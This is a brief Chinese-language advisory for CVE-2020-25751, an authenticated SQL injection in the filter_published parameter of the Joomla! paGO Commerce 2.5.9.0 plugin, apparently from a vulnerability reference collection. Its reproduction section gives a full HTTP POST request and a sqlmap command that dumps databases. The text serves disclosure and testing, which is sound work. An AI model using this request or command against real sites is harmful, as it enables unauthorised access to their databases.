（CVE-2020-25751）Joomla! paGO Commerce 2.5.9.0 sql注入漏洞
===========================================================

一、漏洞简介
------------

Joomla!是美国Open Source
Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。

Joomla! paGO Commerce 插件
2.5.9.0版本存在sql注入漏洞。该漏洞源于`administrator/index.php?option=com_pago＆view=comments filter_published`
参数。攻击者可利用该漏洞执行非法SQL命令。

二、漏洞影响
------------

Joomla! paGO Commerce 2.5.9.0

三、复现过程
------------

    POST /joomla/administrator/index.php HTTP/1.1
    Host: www.0-sec.org:8000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 154
    Origin: http://localhost
    Connection: close
    Referer: http://www.0-sec.org/joomla/administrator/index.php?option=com_pago&view=comments
    Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
    Upgrade-Insecure-Requests: 1

    filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1

**sqlmap poc**:

`sqlmap -r www.0-sec.org --dbs --risk=3 --level=5 --random-agent -p filter_published`

参考链接
--------

> https://www.nmmapper.com/st/exploitdetails/48811/43057/joomla-pago-commerce-2590-sql-injection-authenticated/